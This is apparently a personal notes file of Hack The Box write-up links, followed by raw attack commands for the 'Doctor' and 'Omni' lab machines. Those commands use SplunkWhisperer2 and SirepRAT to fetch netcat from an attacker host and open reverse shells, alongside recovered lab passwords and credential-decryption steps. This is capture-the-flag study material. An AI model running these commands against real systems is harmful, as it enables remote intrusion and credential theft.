Blunder
https://ethicalhacs.com/blunder-hackthebox-walkthrough/

Lame
https://medium.com/bugbountywriteup/htb-lame-writeup-e47100aea88b
https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-lame/

Legacy
https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-legacy/
https://medium.com/@ranakhalil101/hack-the-box-legacy-writeup-w-o-metasploit-2d552d688336

Admirer
https://atsika.info/htb-admirer/

Dlevel
https://medium.com/@ranakhalil101/hack-the-box-devel-writeup-w-o-metasploit-88cc812794f1

FUSE
tabby
https://phantominfosec.wordpress.com/2020/07/08/htb-tabby-walkthrough/

P.O.O HTB Endgame
https://0xdf.gitlab.io/2020/06/08/endgame-poo.html#local-enumeration


Shocker
https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-shocker/


Nest
https://atm-infosec.github.io/hackthebox/2020/06/05/HTB-Nest.html

Jail
https://reboare.github.io/htb/htb-jail.html
https://medium.com/@gabriel.pirjolescu/hack-the-box-jail-write-up-e279862155d4


https://blog.csdn.net/qq_32261191


Travexec
https://resources.infosecinstitute.com/hack-the-box-htb-walkthrough-traverxec/

Zero Logon
https://0xdf.gitlab.io/2020/09/17/zerologon-owning-htb-machines-with-cve-2020-1472.html


Doctor
https://www.youtube.com/watch?v=2BvuoWG_r9Y
 svn checkout svn://10.10.10.203
svn diff -r 2

git clone https://github.com/cnotin/SplunkWhisperer2.git
python PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.2 --username shaun --password Guitar123 --payload 'nc.traditional -e/bin/sh '10.10.14.2' '1234''



Omni Commands

python3 -m http.server 80

https://github.com/SafeBreach-Labs/SirepRAT

python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell Invoke-WebRequest -OutFile C:\\Windows\\System32\\spool\\drivers\\color\\nc64.exe -Uri http://10.10.14.2/nc64.exe" --v   

python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\\Windows\\System32\\spool\\drivers\\color\\nc64.exe 10.10.14.2 1234 -e powershell.exe" --v  



cd WindowsPowershell\Modules\PackageManagement


type r.bat


net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz


 nc -nlvp 1236

C:\Windows\System32\spooldrivers\color\nc64.exe 10.10.14.2 1235 -e powershell.exe

$credential = Import-CliXml -Path U:\Users\app\user.txt 

 $credential = Import-CliXml -Path U:\Users\administrator\root.txt

$credential.GetNetworkCredential().Password


X11 exploit
https://zachgrace.com/training/x11/

